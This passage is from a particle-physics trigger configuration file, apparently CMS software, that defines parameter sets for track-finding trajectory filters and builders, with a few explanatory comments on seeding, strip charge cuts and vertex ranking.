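# selects the seed-creator plugin, SeedMomentumForBOFF is the momentum assigned to
# seeds when the magnetic field is off, OriginTransverseErrorMultiplier scales the
# transverse error taken from the tracking region, and MinOneOverPtError puts a
# floor on the 1/pT uncertainty assigned to the seed state.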
HLTPSetTrajectoryFilterL3 = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.5 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 1000000000 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetDetachedStepTrajectoryBuilder = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedStepTrajectoryFilter" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedStepTrajectoryFilter" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetPixelPairCkfTrajectoryFilterForHIGlobalPt8 = cms.PSet(
minimumNumberOfHits = cms.int32( 6 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 8.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 100 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter0PSetTrajectoryFilterIT = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 0.3 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 4 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter2HighPtTkMuPSetTrajectoryFilterIT = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.3 ),
maxConsecLostHits = cms.int32( 3 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetMuTrackJpsiEffTrajectoryFilter = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 1.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 9 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelPairCkfTrajectoryBuilderForHIGlobalPt8 = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialOppositeForHI" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairCkfTrajectoryFilterForHIGlobalPt8" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialForHI" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator9ForHI" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairCkfTrajectoryFilterForHIGlobalPt8" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetPixelPairStepTrajectoryFilterBase = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 2 ),
minPt = cms.double( 0.1 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetLowPtStepTrajectoryFilter = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 1 ),
minPt = cms.double( 0.075 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTSeedFromConsecutiveHitsCreator = cms.PSet(
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
SeedMomentumForBOFF = cms.double( 5.0 ),
propagator = cms.string( "PropagatorWithMaterial" ),
forceKinematicWithRegionDirection = cms.bool( False ),
magneticField = cms.string( "" ),
OriginTransverseErrorMultiplier = cms.double( 1.0 ),
ComponentName = cms.string( "SeedFromConsecutiveHitsCreator" ),
MinOneOverPtError = cms.double( 1.0 )
)
HLTPSetPixelPairCkfTrajectoryBuilderForHI = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialOppositeForHI" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairCkfTrajectoryFilterForHI" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialForHI" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator9ForHI" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairCkfTrajectoryFilterForHI" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetDetachedCkfTrajectoryBuilderForHI = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 0.0 ),
maxPtForLooperReconstruction = cms.double( 0.0 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialOppositeForHI" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedCkfTrajectoryFilterForHI" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialForHI" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2MeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedCkfTrajectoryFilterForHI" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTIter1PSetTrajectoryBuilderIT = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "CkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltIter1ESPMeasurementTracker" ),
lostHitPenalty = cms.double( 30.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter1PSetTrajectoryFilterIT" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator16" ),
intermediateCleaning = cms.bool( True ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTPSetDetachedCkfTrajectoryBuilderForHIGlobalPt8 = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 0.0 ),
maxPtForLooperReconstruction = cms.double( 0.0 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialOppositeForHI" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedCkfTrajectoryFilterForHIGlobalPt8" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialForHI" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2MeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedCkfTrajectoryFilterForHIGlobalPt8" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTSiStripClusterChargeCutForHI = cms.PSet( value = cms.double( 2069.0 ) )
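# The SiStripClusterChargeCut PSets hold a single threshold: strip clusters whose
# (roughly path-length-corrected) charge falls below `value` fail the cut referenced
# via minGoodStripCharge in the trajectory filters; the "None" variant effectively
# disables the cut.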
HLTPSetLowPtStepTrajectoryBuilder = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetLowPtStepTrajectoryFilter" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 4 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetLowPtStepTrajectoryFilter" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetMuTrackJpsiEffTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "CkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltESPMeasurementTracker" ),
lostHitPenalty = cms.double( 30.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMuTrackJpsiEffTrajectoryFilter" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterial" ),
maxCand = cms.int32( 1 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
intermediateCleaning = cms.bool( True ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTPSetTrajectoryFilterForElectrons = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 2.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( -1 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( -1 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetJetCoreStepTrajectoryBuilder = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetJetCoreStepTrajectoryFilter" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 50 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetJetCoreStepTrajectoryFilter" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetPvClusterComparer = cms.PSet(
track_chi2_max = cms.double( 9999999.0 ),
track_pt_max = cms.double( 10.0 ),
track_prob_min = cms.double( -1.0 ),
track_pt_min = cms.double( 2.5 )
)
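# The PvClusterComparer PSet defines the track selection and weighting used when
# ranking pixel-vertex candidates: track_pt_min, track_chi2_max and track_prob_min
# select the tracks entering the sum, while track_pt_max roughly caps each track's
# pT in the weight so that a single high-pT track does not dominate the ranking.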
HLTIter0HighPtTkMuPSetTrajectoryBuilderIT = cms.PSet(
ComponentType = cms.string( "CkfTrajectoryBuilder" ),
lostHitPenalty = cms.double( 30.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter0HighPtTkMuPSetTrajectoryFilterIT" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
maxCand = cms.int32( 4 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
intermediateCleaning = cms.bool( True ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTPSetPixelLessStepTrajectoryFilterBase = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.05 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 0 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter1GroupedCkfTrajectoryBuilderIT = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltIter1ESPMeasurementTracker" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter1PSetTrajectoryFilterIT" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator16" ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetMuonCkfTrajectoryBuilderSeedHit = cms.PSet(
rescaleErrorIfFail = cms.double( 1.0 ),
ComponentType = cms.string( "MuonCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltESPMeasurementTracker" ),
lostHitPenalty = cms.double( 30.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMuonCkfTrajectoryFilter" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterial" ),
maxCand = cms.int32( 5 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
intermediateCleaning = cms.bool( False ),
propagatorProximity = cms.string( "SteppingHelixPropagatorAny" ),
updator = cms.string( "hltESPKFUpdator" ),
deltaEta = cms.double( -1.0 ),
useSeedLayer = cms.bool( True ),
deltaPhi = cms.double( -1.0 ),
seedAs5DHit = cms.bool( False )
)
HLTPSetPixelPairCkfTrajectoryFilterForHI = cms.PSet(
minimumNumberOfHits = cms.int32( 6 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 1.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 100 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetInitialStepTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilter" ) ),
useSameTrajFilter = cms.bool( True ),
maxCand = cms.int32( 3 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
foundHitBonus = cms.double( 10.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( True ),
estimator = cms.string( "hltESPInitialStepChi2ChargeMeasurementEstimator30" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
minNrOfHitsForRebuild = cms.int32( 1 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
seedAs5DHit = cms.bool( False )
)
HLTPSetInitialStepTrajectoryFilter = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 3 ),
seedPairPenalty = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.2 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 999 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
pixelSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
maxCCCLostHits = cms.int32( 0 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetLowPtQuadStepTrajectoryBuilder = cms.PSet(
